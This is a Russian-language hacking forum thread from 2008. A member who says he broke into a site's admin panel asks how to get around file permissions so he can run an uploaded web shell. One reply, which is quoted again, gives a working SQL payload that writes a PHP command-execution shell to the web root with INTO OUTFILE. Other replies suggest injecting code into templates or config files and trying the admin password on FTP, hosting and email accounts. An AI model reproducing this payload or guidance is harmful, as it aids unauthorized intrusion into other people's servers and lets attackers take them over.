Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.11.2008, 08:48
|
|
Новичок
Регистрация: 12.11.2008
Сообщений: 5
Провел на форуме:
50575
Репутация:
20
|
|
как обойти chmod
народ помогите с таким вопросом! есть сайт его я взламал попал в админку в админке есть возможность добавлять файлы но! зараза выставляет chmod 0666 и когда я обращаюсь напрямую к файлу меня перекидывает на сайт хостера (агава) и пишет что права должны быть 0755 что делать вот вроде победа близка  залить шелл пытался но из за этих прав все к чертям. в папку данную можно залить что угодно хоть .htaccess ( им я чтонибудь могу сделать?)
кстати тамже можно выполнить любой sql код там есть хрень для ввода sql команд |
|
|
25.11.2008, 09:23
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
ни че тут не сделаешь пробуй в шаблоны код вставить или еще куда либо
|
|
|
|
25.11.2008, 09:27
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
А может дело в хостере, а?
|
|
|
|
25.11.2008, 10:14
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";
|
|
|
|
25.11.2008, 11:41
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
Сообщение от _Pantera_
CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";
после такова запроса у shell.php права будут -rw-rw-rw-
мало вероятно что он запустится, и агава вроде не даёт привилегия File для mysql.
ТС ищи скрипты которые можно редактировать, для начала попробуй конфиг
|
|
|
|
25.11.2008, 16:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829
Репутация:
405
|
|
php скрипту не нужны права на запуск. это же не программа... или я не прав?
|
|
|
|
25.11.2008, 17:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
php скрипту не нужны права на запуск.
все верно
Последний раз редактировалось [Raz0r]; 26.11.2008 в 00:48..
Причина: ступил...
|
|
|
|
25.11.2008, 21:55
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
ТС попробуй, можт пароль от админки к ftp/хостингу/мылу подходит = )
|
|
|
|
27.11.2008, 13:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
Сообщение от [Raz0r]
все верно
лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький
|
|
|
|
27.11.2008, 17:55
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Сообщение от chekist
лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький
Ну да, сейчас, так частенько делают: залить скрипт к соседнему юзеру в папку с правами 777 можешь, а выполнить нет. Я писал про такую хрень недавно
http://forum.antichat.ru/thread90408.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
